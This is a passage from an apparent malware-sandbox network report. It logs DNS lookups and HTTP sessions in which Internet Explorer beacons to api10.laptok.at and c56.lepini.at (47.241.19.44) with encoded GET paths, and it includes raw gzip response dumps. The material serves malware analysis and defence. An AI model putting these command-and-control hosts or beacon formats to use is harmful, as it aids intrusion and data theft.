                                                                                                                                      Nov 24, 2020 21:18:57.283297062 CET53634928.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:18:58.370898962 CET6083153192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:18:58.406500101 CET53608318.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:18:59.613343954 CET6010053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:18:59.649346113 CET53601008.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:00.950651884 CET5319553192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:00.977987051 CET53531958.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:02.430480003 CET5014153192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:02.457798958 CET53501418.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:03.536190987 CET5302353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:03.563496113 CET53530238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:04.573903084 CET4956353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:04.600985050 CET53495638.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:05.307780981 CET5135253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:05.343734026 CET53513528.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:06.375205040 CET5934953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:06.411031008 CET53593498.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:07.416126013 CET5708453192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:07.443293095 CET53570848.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:08.476389885 CET5882353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:08.503844976 CET53588238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:10.887249947 CET5756853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:10.914577007 CET53575688.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:11.981955051 CET5054053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:12.018049955 CET53505408.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:14.438371897 CET5436653192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:14.465728045 CET53543668.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:15.324086905 CET5303453192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:15.370722055 CET53530348.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:17.721226931 CET5776253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:17.724993944 CET5543553192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:17.759165049 CET53577628.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:17.760394096 CET53554358.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:23.278008938 CET5071353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:23.305476904 CET53507138.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:29.867939949 CET5613253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:29.907479048 CET53561328.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:36.579261065 CET5898753192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:36.623406887 CET53589878.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:45.307039976 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:45.345153093 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:46.300085068 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:46.327358961 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:46.823534012 CET6063353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:46.862984896 CET53606338.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:47.317177057 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:47.344445944 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:49.214868069 CET6129253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:49.242223024 CET53612928.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:50.083645105 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:50.111068964 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:53.453824997 CET6361953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:53.490825891 CET53636198.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:54.098855019 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:54.134315968 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:00.613964081 CET6493853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:00.653554916 CET53649388.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.575886011 CET6194653192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:01.611551046 CET53619468.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:06.169200897 CET6491053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:06.205080986 CET53649108.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:27.066874981 CET5212353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:27.093872070 CET53521238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:27.429882050 CET5613053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:27.470750093 CET53561308.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:47.239192009 CET5633853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:47.274983883 CET53563388.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:47.974076986 CET5942053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:48.001683950 CET53594208.8.8.8192.168.2.3

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      Nov 24, 2020 21:19:17.724993944 CET192.168.2.38.8.8.80xeb32Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:01.575886011 CET192.168.2.38.8.8.80x3607Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:06.169200897 CET192.168.2.38.8.8.80xce1fStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:47.239192009 CET192.168.2.38.8.8.80x2611Standard query (0)c56.lepini.atA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      Nov 24, 2020 21:19:17.760394096 CET8.8.8.8192.168.2.30xeb32No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:01.611551046 CET8.8.8.8192.168.2.30x3607No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:06.205080986 CET8.8.8.8192.168.2.30xce1fNo error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:47.274983883 CET8.8.8.8192.168.2.30x2611No error (0)c56.lepini.at47.241.19.44A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • api10.laptok.at
                                                                                                                                      • c56.lepini.at

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.34973247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:19:18.053018093 CET184OUTGET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:19:19.034208059 CET197INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:19:18 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.34975147.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:01.881902933 CET4054OUTGET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:02.933356047 CET4055INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:02 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 ab 40 14 45 07 44 03 b7 26 ee 16 9c 1e ee ee 8c fe bf df 4e 56 a0 e0 d6 39 7b 07 d6 4d d3 03 32 8f 68 51 ec dd a4 d5 03 89 87 98 b3 1b 6f df 85 86 fd db eb df a1 f7 6a 94 f1 93 f1 24 42 e6 e4 ba 60 24 36 cd 08 66 90 b5 f8 01 db 84 68 d0 be 9b e6 09 88 b2 86 93 f4 32 4b 37 33 5f ca 10 25 01 be f3 e9 47 28 85 60 d1 37 d8 75 32 c1 f0 c3 41 9d ea d2 61 a7 10 06 b3 77 01 c0 b6 b8 02 88 ed 08 82 11 8c fb 07 e9 3b d2 c2 84 c7 c3 e3 1f 76 bf a6 fd 90 0a b6 6d e8 c8 64 9e c8 77 d9 70 c6 a6 a5 76 32 a2 43 9d ab bf cb 20 8f 02 8c 16 86 1a 4e 0d 82 da 54 1b 01 b0 1d 40 16 35 31 40 8d 6d 9a 21 ed 7c 0f 93 79 4d 1a cb 88 00 9a 60 86 10 4f a6 36 81 13 1d f0 f1 2d 16 9d c2 ad cb b3 26 3b 9c 31 fe f4 af 33 e2 14 50 07 27 0c f2 b9 d3 d8 50 9d 6f 34 b6 d0 b1 c1 f6 03 25 8e d2 18 cf 95 e4 78 13 e2 5c c0 ff 06 8b bb 6f 49 67 ec de cc 55 dc 9d c1 f3 77 99 48 46 82 3a 23 bb 09 69 7e 94 fc 0e e4 aa 9b 3b 2b ce 2c ca 3c 2f 1f 4a ad 89 e2 a2 7b 31 7e 33 b4 9a 74 b6 a1 0c d5 80 bf 22 62 dc 7b fd 96 75 2f 73 e3 90 24 0d 64 37 42 e6 fe b8 a6 4a 3b 7a e4 22 01 b3 ab 5b 79 65 a2 64 47 de a3 09 b8 4e a1 02 fe 9b 49 fc 37 de d4 8a 19 f8 1d 20 63 24 6c 39 35 fd 80 b6 24 e6 d0 40 58 fc 07 27 f1 d4 68 0e 9b 4f 5d b1 10 f8 8c 33 0d a9 8d 41 1c da ca af 5a 8c 38 0c d4 3c ad fa d1 a5 72 23 3d 16 cb b8 17 7c 3f 5d 8c fb d9 73 62 8a fe 24 10 c3 f6 e8 04 6c e2 05 ab 77 c4 ef 14 9e 05 0f 80 74 5f 27 81 64 70 67 64 c0 09 a6 74 e9 ea 88 b5 7b 34 bb 16 08 bc 2d e8 ed e9 b5 3a 4b f1 0a c7 e2 18 1c 62 be 51 6c 62 d2 ab 78 c5 9f 00 23 a8 33 60 cb 89 de be c5 8f 4a fe 42 fd 91 40 73 b8 08 d4 da af bd 5f 47 b2 da dc 9d 6a c7 18 db e8 33 29 de ef 02 77 c3 37 99 31 8b 27 3e a1 99 e7 cc 85 ef c5 69 9e 04 80 de af 4b cd f2 18 af 66 6d 51 b5 d2 96 39 84 c9 94 3c 69 10 ac 4b cd 4d bb 73 eb 95 9b 30 a1 39 11 9c f4 df 30 42 95 98 81 19 ed fe a0 2c 07 31 c5 e7 43 3b e0 27 4b e0 3a e2 2d a2 e5 64 74 72 23 32 58 d9 d2 89 29 a6 43 3e 01 78 f1 5b 64 5b 24 3f a4 dd f6 47 68 f9 0d e5 07 be 56 de cb 9d 20 8c ba 1f 66 01 2c ac d2 19 87 45 d3 66 b9 a0 3d d1 c5 ac 10 a6 63 90 6a 71 2e b6 5b 39 c7 3a c3 3e 22 2a 73 df 42 ef 89 10 93 15 a3 0b e6 3a 4c f4 c9 40 a3 df 04 cd 79 86 8c 6a ca ef 78 0e 1a 61 67 30 02 e6 fe b0 f1 de 9a 37 9d 0c 6e e3 f8 56 7a c3 b3 31 46 d5 1f 7d ca bc 38 0d bd 21 b2 d3 8b 00 a1 37 bd 5b c1 25 ce 84 8e 18 ce fb 0e 8b 8f 9e 64 1c 3a 5c 51 31 50 ec e3 8c b7 47 4c 6b f2 c2 87 f0 c9 c3 01 fa 9b 6d da 4c 9e ea b2 07 c0 6a 26 83 59 47 a3 0a d9 ca 22 db c6 91 8d ca 17 e3 e3 ac 41 a0 a7 0d 53 13 f7 8c 41 8d 55 89 b6 d9 ee 04 e8 55 9f c8 81 69 5c 1a 08 55 6b 04 f0 53 dc f5 f8 f1 29 73 b9 46 e0 fd 25 c5 77 3e e7 10 06 b1 f4 15 10 e2 27 83 3b 43 6b fd 4c ea b9 7b fa 97 50 9e ae 51 ef 97 15 36 5f 4a ea 06 f2 b2 3a b0 e8 f3 8b 53 b9 fc 95 30 70 7a 94 f5 cb 72 e4 c8 fd 74 2e a1 c0 ca 19 06 a0 d5 2b ab 5b cc 46 71 db 0b b7 ae ed 4b 76 21 92 44 c0 ad b9 bd c7 01 ba f1 c5 50 80 a2 48 31 55 bc af 15 20 e1 e4 34 64 86 9a 55 69 89 33 5c 15 8c 2e 34 b8 91 17 5b 19 e2 d2 d5 e2 e0 49 fd 9b 80 18 94 8c e4 a8 85 82 16 70 88 ac 74 37 f2 05 6b 81 00 71 0f 7e ac 8a
                                                                                                                                      Data Ascii: 2000E@ED&NV9{M2hQoj$B`$6fh2K73_%G(`7u2Aaw;vmdwpv2C NT@51@m!|yM`O6-&;13P'Po4%x\oIgUwHF:#i~;+,</J{1~3t"b{u/s$d7BJ;z"[yedGNI7 c$l95$@X'hO]3AZ8<r#=|?]sb$lwt_'dpgdt{4-:KbQlbx#3`JB@s_Gj3)w71'>iKfmQ9<iKMs090B,1C;'K:-dtr#2X)C>x[d[$?GhV f,Ef=cjq.[9:>"*sB:L@yjxag07nVz1F}8!7[%d:\Q1PGLkmLj&YG"ASAUUi\UkS)sF%w>';CkL{PQ6_J:S0pzrt.+[FqKv!DPH1U 4dUi3\.4[Ipt7kq~


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.2.34975047.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:04.595921040 CET4267OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:05.392426014 CET4268INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:05 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      3192.168.2.34975347.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:06.486884117 CET4269OUTGET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:07.513534069 CET4271INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:07 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 96 a4 50 14 45 3f 88 00 b7 10 77 77 32 a4 70 a7 d1 af 1f 26 ac a4 16 bc 77 ef 39 7b 57 af 6e aa e0 5e 15 05 0f 8a 75 43 3a 4a 82 16 6f f7 83 c3 1d ef 42 1c e7 b8 d0 c7 ce 65 a5 8e cd 1c a7 6b f9 86 21 c7 63 3c f9 fa c7 83 d0 df 5c 75 2f 10 51 22 f7 f3 8b ba 9e 56 64 91 10 10 29 cd ba 55 93 41 8d 20 97 3b 68 ea bc 28 be db eb 73 1c e8 36 a9 a9 35 63 4e d9 53 b9 d4 f2 7c ab 0a 22 21 bf 67 c0 5c 2c 37 b8 14 e5 9d 1e fe ef ad d3 e2 9a fb 24 7d f5 16 c6 65 c7 aa 3a 00 e6 53 15 75 e1 54 1c 6d e7 f4 1c 2c 07 80 4a a0 d8 d3 6e 5a 1f f8 83 99 4b 92 3a 3c 8b 7f 69 67 73 7f ef fc 07 a2 a8 0d 94 03 5d 1e e7 46 af 3d 4c 9c 71 19 2d be 45 8b ac aa 45 8d 26 4e 23 4d 37 ce df df 0f 07 19 20 8a 1f 59 a9 89 5e 46 2a d7 8e fa 85 61 7e 4c 77 13 92 5f 6f e5 fa a8 f8 5f 46 29 90 ff fb 6d 54 62 2f 88 aa bf cc 0b 73 ac df bb 1c d9 21 b9 2b 60 0b 6f 2c e6 32 91 aa c5 30 5c 20 81 44 99 b6 78 b2 ff c1 46 44 f1 15 eb 89 44 b8 05 fe cc 53 a9 3b 23 b8 ac cf 9b 37 4e c9 b4 8a c2 9f e5 be ce 86 60 47 e9 76 1b 71 9a 9b 20 f0 77 73 c2 99 16 f2 15 f5 54 83 97 92 10 35 c9 c9 fa f4 85 fc 5b 49 82 0d a9 c7 e6 c5 c5 88 4b de db a9 b2 e8 b1 ac 6a 31 0a bc 05 d4 76 83 54 cf 37 23 e0 b0 2b 9b 71 f8 02 5a 76 43 b6 7d fe a5 54 0f d5 80 bd f4 6a 87 3d 17 55 40 5e 05 4d a8 8f b0 a8 7c 7a a7 28 68 9a 22 31 72 0e 2d 02 b6 59 2a 43 94 96 0b 15 07 6f 5d aa d8 2b 7b 61 ea 24 c3 6b 80 d5 95 b5 b8 dc cc 04 e3 64 40 02 0a c3 d2 fa f4 ac bb 4d 80 a3 c9 0b 71 eb fd 26 d4 14 ad 4b 9c c4 80 68 aa 1f 07 48 18 c5 56 da b4 82 eb 79 9c 8e 92 02 90 0d d8 37 80 38 55 c2 64 26 16 1b a5 24 61 92 97 87 70 53 d4 c5 96 0c a3 da 4e 17 77 5c db 43 4e eb 65 a9 aa 6f 58 44 26 21 59 af c9 f7 68 ad 81 ce d3 35 d4 79 c5 8d 46 ad 85 f8 a0 72 a0 86 fa 5a b6 9b f4 86 fb d3 1c df f1 f0 17 47 e6 2e 0e 73 ea 14 9a dd 89 b6 d5 86 20 26 09 de 97 b2 9a 11 45 1b 05 15 8f 1d e0 44 aa cf eb 45 f7 42 4c 93 f5 d1 dc 2e e9 36 52 c9 f0 c9 9c 58 a8 67 4c 22 96 4a e9 79 aa 3c 54 6d 82 6b d2 7a d7 cc f0 23 63 8b e5 07 2e bf 01 8f 4d 1c 2f 29 dc a8 27 e7 06 15 35 e6 fe 3a 1c ac f3 98 d0 bb f2 11 b2 94 97 e2 3a 83 95 81 64 56 90 44 2d 88 e1 ef 76 43 cb 30 3e ca e1 d9 8a 81 0a f9 88 95 f6 66 ec 8c 5b af e8 9a 64 97 46 62 69 f5 24 36 f2 6c 01 56 e7 7f 4a a6 62 68 cb 19 c7 2e e2 51 25 fc 6a 6e fc 5b e2 8c 7a 08 25 0c 0e c7 c7 cb 40 1b a2 09 83 ea ab ca 7e 9d f0 64 99 4d 66 09 51 b6 22 04 42 04 c2 e7 bd a5 9f c8 7d ce 65 24 2a bd e7 8a d8 7a 3c c3 b9 9d b7 3b 45 98 7b 33 6f c8 82 d2 70 ef c0 f9 17 96 df 46 9a 2c d4 8e cb 0b 4c 30 7c 2e 33 9e 1e 40 16 e9 2b 32 d3 06 84 e9 7b 12 56 3c 87 fe 15 6f e8 08 3b db 35 bd af 4a 48 8d e8 5a 62 c0 a6 6c 94 ed e0 7c fb 81 51 92 74 ff ae 66 07 6a 01 d4 19 43 19 c1 60 5f 19 95 39 8c 03 2d 35 9f e6 7e 6e 9f be 16 4a 4f 78 54 66 2b 31 e0 44 a3 cb 82 49 46 a4 22 11 ae 0c a2 88 8f 4d 67 f0 d7 4f 9c 90 3b bb 6a d4 e7 39 54 2d 39 e4 34 38 b6 c4 7d ad cc c2 bd 3d 4f e9 fb 37 38 de 54 b4 06 dd 93 b8 84 1e a5 7e d5 e4 82 80 69 48 37 f5 f8 78 3f 52 2c 8c b6 a5 4e 10 38 14 c2 8a 97 59 c7 0d 50 2a 11 92 ef f1 a6 e6 b5 b4 bb 56 9e 94 81 40 6b 90 56 48 ec f3 98 1b 6c a5 cc
                                                                                                                                      Data Ascii: 2000PE?ww2p&w9{Wn^uC:JoBek!c<\u/Q"Vd)UA ;h(s65cNS|"!g\,7$}e:SuTm,JnZK:<igs]F=Lq-EE&N#M7 Y^F*a~Lw_o_F)mTb/s!+`o,20\ DxFDDS;#7N`Gvq wsT5[IKj1vT7#+qZvC}Tj=U@^M|z(h"1r-Y*Co]+{a$kd@Mq&KhHVy78Ud&$apSNw\CNeoXD&!Yh5yFrZG.s &EDEBL.6RXgL"Jy<Tmkz#c.M/)'5::dVD-vC0>f[dFbi$6lVJbh.Q%jn[z%@~dMfQ"B}e$*z<;E{3opF,L0|.3@+2{V<o;5JHZbl|QtfjC`_9-5~nJOxTf+1DIF"MgO;j9T-948}=O78T~iH7x?R,N8YP*V@kVHl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      4192.168.2.34975247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:09.379180908 CET4539OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:10.187980890 CET4539INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:09 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
